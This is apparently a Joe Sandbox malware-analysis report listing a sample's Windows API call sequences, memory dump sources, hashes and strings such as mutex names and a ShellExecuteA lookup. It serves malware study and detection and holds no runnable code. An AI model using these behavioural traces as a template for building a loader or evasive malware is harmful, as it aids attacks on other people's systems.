                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleHeap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 4176491614-0
                                                                                                            • Opcode ID: 9b940997005f161f15e7a28e78b2c6f81d1ccfaa8d6b3a5ae262a4a450a3c222
                                                                                                            • Instruction ID: 681b4e6dc337d1e511d1f06429035bc5d138342e21fd76a4f3933710e6052619
                                                                                                            • Opcode Fuzzy Hash: 9b940997005f161f15e7a28e78b2c6f81d1ccfaa8d6b3a5ae262a4a450a3c222
                                                                                                            • Instruction Fuzzy Hash: AEF0B279E01258DBEF248BA8D84D7EDB774FB48322F00869AEA1992290C77459D4CF60
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00403F01
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00403FB0
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00404139
                                                                                                              • Part of subcall function 004041C0: KiUserExceptionDispatcher.NTDLL(?,00404168), ref: 004041C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCreateDispatcherExceptionLibraryLoadMutexUserVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 913672479-0
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: 4c255a9ca1704f3bfdc674421c9317b92510fa80918e0642c738ddf0f5b3c1fa
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 6AB11975A002898FEB10CF14CC44BA937A5FF54305F484526DD09BF3A1D37AAA95CB4E
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2100), ref: 00901D3C
                                                                                                            • GetDriveTypeA.KERNEL32(00000000), ref: 00901D55
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00901D80
                                                                                                              • Part of subcall function 00901060: Sleep.KERNEL32(?,?), ref: 009010BF
                                                                                                              • Part of subcall function 00901060: lstrcat.KERNEL32(?,008F3D20), ref: 009010DD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DriveExitSleepThreadTypeUserlstrcatlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899959655-0
                                                                                                            • Opcode ID: 292819fdab8085bffb2cdc400faec72e52117a680f3a0be448a5705660d1f3fb
                                                                                                            • Instruction ID: 3602bb0b3acaa28a589fd7babb0efece329f93e5c66f14fa103bcec9e8812954
                                                                                                            • Opcode Fuzzy Hash: 292819fdab8085bffb2cdc400faec72e52117a680f3a0be448a5705660d1f3fb
                                                                                                            • Instruction Fuzzy Hash: 1E11A131A00218AFDB258B68CC05BEAB7B9BF58B00F0001E9F709A7291DB705A44CB91
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 008F42B3
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 008F42D4
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F42DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitObjectSingleSleepThreadUserWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 295063474-0
                                                                                                            • Opcode ID: fbd89994c7ad94da6f0b0e4c1b03d2b0cac7d66c14d0302bae7df27fe9dda874
                                                                                                            • Instruction ID: bcfb09afc70c481863de1a0a213dc81f5ff5607c893415d1cc4febdd157dbc87
                                                                                                            • Opcode Fuzzy Hash: fbd89994c7ad94da6f0b0e4c1b03d2b0cac7d66c14d0302bae7df27fe9dda874
                                                                                                            • Instruction Fuzzy Hash: 25014B7061520CEBEB04CFA4ED09BBA77B5FB41709F205266F701E6280D7B29E50EB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 008FA75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 008FA78C
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000), ref: 008FA796
                                                                                                              • Part of subcall function 008FA75A: lstrcat.KERNEL32(00000000,008F3CC0), ref: 008FA7B2
                                                                                                              • Part of subcall function 008FA75A: lstrcpy.KERNEL32(00000000,00000000), ref: 008FA7CF
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000,008F2880,00000000), ref: 008FA7FD
                                                                                                              • Part of subcall function 008FA75A: wsprintfA.USER32 ref: 008FA809
                                                                                                            • CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
                                                                                                            • WriteFile.KERNEL32(000000FF,008D26B0,00000401,00000000,00000000), ref: 0090304E
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00903058
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Filelstrlen$CloseCreateHandlePathTempWritelstrcatlstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 817978534-0
                                                                                                            • Opcode ID: 77b660f86acc22a26e5c8b79b20a8559bf6ba44e94e08be4785a32f78e49d3c3
                                                                                                            • Instruction ID: 302ff8365db82162e6a5ba33398746952bef96990d40f952c0fbc377e0cd67fb
                                                                                                            • Opcode Fuzzy Hash: 77b660f86acc22a26e5c8b79b20a8559bf6ba44e94e08be4785a32f78e49d3c3
                                                                                                            • Instruction Fuzzy Hash: DDF030B5A40308BBEF14AFA4DC4EF9E7B38AB44711F104655FB05AA3C0D6B19A448791
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009008E2
                                                                                                            • RtlLeaveCriticalSection.NTDLL(00909018), ref: 009008F4
                                                                                                            • Sleep.KERNEL32(00000400), ref: 0090090F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeGlobalLeaveSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2599486065-0
                                                                                                            • Opcode ID: d651be68e494bc868d9366591640c180c4bf37bd203afd0347ab4bd2b97f3338
                                                                                                            • Instruction ID: ed42b2aff20ac6fff53661d509577909a4914f81c46ddb690a1f0ca41d39393c
                                                                                                            • Opcode Fuzzy Hash: d651be68e494bc868d9366591640c180c4bf37bd203afd0347ab4bd2b97f3338
                                                                                                            • Instruction Fuzzy Hash: 8CF03476A0121ADBDF249F84D8097EDB774FF84325F00426AEA25A26C1D7391901CF40
                                                                                                            APIs
                                                                                                            • IsBadWritePtr.KERNEL32(00000110,00000000), ref: 008F8B3E
                                                                                                            • Sleep.KERNEL32(00001770), ref: 008F8B8E
                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 008F8BB0
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 008F8CD2
                                                                                                            • Sleep.KERNEL32(0043001E), ref: 008F8D9D
                                                                                                            • Sleep.KERNEL32(001B7740), ref: 008F8DAA
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F8DD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ExitThreadUserWritelstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664100127-0
                                                                                                            • Opcode ID: 64294c1de915610038742f192a8c3fac3b3f370bdfb8964273f235602b8c83f0
                                                                                                            • Instruction ID: 5217cccad85a00ce3a89444fcd09fe8ac09eda53c5a17ad27be00a26035caa65
                                                                                                            • Opcode Fuzzy Hash: 64294c1de915610038742f192a8c3fac3b3f370bdfb8964273f235602b8c83f0
                                                                                                            • Instruction Fuzzy Hash: A6415DB1A0511CCBCB64DB24CCD4BB9B7B5FF84305F0480AAD60A96242EB346EC5DF59
                                                                                                            APIs
                                                                                                            • MapViewOfFile.KERNEL32(000001C8,00000006,00000000,00000000,00015400), ref: 008FC8D1
                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 008FC900
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileView$Unmap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3282598733-0
                                                                                                            • Opcode ID: 58840b2b968ac866758956c5f9b7d50fe97c6974d433aa11ba3c9c0094183ebb
                                                                                                            • Instruction ID: a54aba307401dab4df84d45e3c27b8d9a94393dda9b8e5b38e85ea7762dadbba
                                                                                                            • Opcode Fuzzy Hash: 58840b2b968ac866758956c5f9b7d50fe97c6974d433aa11ba3c9c0094183ebb
                                                                                                            • Instruction Fuzzy Hash: FFF06975A4020CFBCB10DFA4DD4DBAD7B74BB04345F204244EA186B2D0D7B55A84DB44
                                                                                                            APIs
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 008FA295
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 008FA29F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesDelete
                                                                                                            • String ID:
                                                                                                            • API String ID: 2910425767-0
                                                                                                            • Opcode ID: 83869bfbee7a0f118fe5b1e5dea3bc9e749c054532c75315133eb7d17c5948b3
                                                                                                            • Instruction ID: 465ca5b173d2e9dee7c640a579d6112becc497769c8c86e4d279bf2fee55fb5b
                                                                                                            • Opcode Fuzzy Hash: 83869bfbee7a0f118fe5b1e5dea3bc9e749c054532c75315133eb7d17c5948b3
                                                                                                            • Instruction Fuzzy Hash: DBE012B530430CBBDB085B70DC0DB763758FF54764F204512FB0ECA151E576D5449A52
                                                                                                            APIs
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,008F2104), ref: 008F62A8
                                                                                                            • MapViewOfFile.KERNEL32(000001A0,00000006,00000000,00000000,00008000), ref: 008F62CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID:
                                                                                                            • API String ID: 3452162329-0
                                                                                                            • Opcode ID: 4571d4d3a326a5bb3d361b72bee5dff2dac731a81c4f45670c91817f840988cf
                                                                                                            • Instruction ID: 0ea71d4e2fa8f281e03daeb34c45ca1eb3fff7152b061505c744886748f44bba
                                                                                                            • Opcode Fuzzy Hash: 4571d4d3a326a5bb3d361b72bee5dff2dac731a81c4f45670c91817f840988cf
                                                                                                            • Instruction Fuzzy Hash: E5F0C9746A9300AFF7209F64FC4AB5137B8B744B24F208209FB155A2E2D7B66488DB54
                                                                                                            APIs
                                                                                                            • FindClose.KERNEL32(00000000), ref: 009014B5
                                                                                                            • Sleep.KERNEL32(00000400), ref: 009014C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFindSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 1358061995-0
                                                                                                            • Opcode ID: c87bd0748c825760a720da42cd86bec7cb1bccacc9af05ee0a07729627e3e155
                                                                                                            • Instruction ID: 24c67a1807e7782516078d4f80fa9899c884259aa68fad80638cc64248c69325
                                                                                                            • Opcode Fuzzy Hash: c87bd0748c825760a720da42cd86bec7cb1bccacc9af05ee0a07729627e3e155
                                                                                                            • Instruction Fuzzy Hash: 95E08C76A00608DFCF10DF94E8497ADB770FB48322F00436ADA15A32D0C7390841CBA0
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0001F200), ref: 009037F4
                                                                                                              • Part of subcall function 00902FFF: CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
                                                                                                              • Part of subcall function 00902FFF: WriteFile.KERNEL32(000000FF,008D26B0,00000401,00000000,00000000), ref: 0090304E
                                                                                                              • Part of subcall function 00902FFF: CloseHandle.KERNEL32(000000FF), ref: 00903058
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 00903852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocCloseCreateGlobalHandleSleepWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 653111876-0
                                                                                                            • Opcode ID: 9c6d90d4f7ae9de27009598b97e8d6cfd309e516454a7f2bced2e8a2fe7eed3d
                                                                                                            • Instruction ID: 05858dffbef3c8357497d450b34ac636bf9a6ee6bae7c4ecd8a3e3b45d848faa
                                                                                                            • Opcode Fuzzy Hash: 9c6d90d4f7ae9de27009598b97e8d6cfd309e516454a7f2bced2e8a2fe7eed3d
                                                                                                            • Instruction Fuzzy Hash: 414174B2914218AFDB24DB68DC52BE9B379BB58300F0085E5F70DE7281DB756B848F91
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F5983
                                                                                                            • wsprintfA.USER32 ref: 008F5AF0
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 008F5B2D
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 008F5BFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wsprintf$CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2158237808-0
                                                                                                            • Opcode ID: 7d96f63e052d9640e0aa03f351474aaa21fdd7d8e82ef8580147202f07693b1b
                                                                                                            • Instruction ID: b6f9966f5f3c5a5d5ea44c371b335802d2d557ba81e9b2d4c18949ad5630c0b8
                                                                                                            • Opcode Fuzzy Hash: 7d96f63e052d9640e0aa03f351474aaa21fdd7d8e82ef8580147202f07693b1b
                                                                                                            • Instruction Fuzzy Hash: A7F0E730A0151CDBCB24DFA8E9887A9B7B5FF48319F1442DAD60AA7251C7749E90DE44
                                                                                                            APIs
                                                                                                            • KiUserExceptionDispatcher.NTDLL(?,00404168), ref: 004041C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 6842923-0
                                                                                                            • Opcode ID: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                                                                                            • Instruction ID: 8859ecbdd4533cbe9e394e21547837cab7727e605e906859d16431a079c461d0
                                                                                                            • Opcode Fuzzy Hash: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                                                                                            • Instruction Fuzzy Hash: 01D0A7B42002044FDF54CF358908038BAE4EF99310B51057CE4C5EB360E7749D409B05
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountExchangeInterlockedTick
                                                                                                            • String ID: x$z${
                                                                                                            • API String ID: 3499635708-1334427886
                                                                                                            • Opcode ID: c703dfa854dc04d1a6e0cb145cd87ffdc26433107659879908e82559c1841a57
                                                                                                            • Instruction ID: 59c2255ee4c8b876349a89211e73f0b18b0ada1c8a0e316dbed14df9ac23f0dd
                                                                                                            • Opcode Fuzzy Hash: c703dfa854dc04d1a6e0cb145cd87ffdc26433107659879908e82559c1841a57
                                                                                                            • Instruction Fuzzy Hash: 02622BB1E0010EDFCB04DFA8C981ABE77B1FF98314F248229E619E7281D7349A55DB95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f907cf3964e031144e6f630bff2b0851759c15c7df66bdbf2677b0f3875127b
                                                                                                            • Instruction ID: 2ac79933e0a9865d0d7533d8f72e0d0ffda6034e88cdbb163b71e03dcf13cc7d
                                                                                                            • Opcode Fuzzy Hash: 8f907cf3964e031144e6f630bff2b0851759c15c7df66bdbf2677b0f3875127b
                                                                                                            • Instruction Fuzzy Hash: 02711C74E0424A8FDB08CF69C4507BFBBB2EF89304F18C469D955AB381D7359A12CB90
                                                                                                            APIs
                                                                                                            • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 0097D831
                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 0097D858
                                                                                                            • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 0097D872
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 0097D88C
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0097D8A2
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,0097EED8,000001FE), ref: 0097D935
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0097D954
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0097D962
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0097D98F
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0097D996
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0097D9A5
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0097D9AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
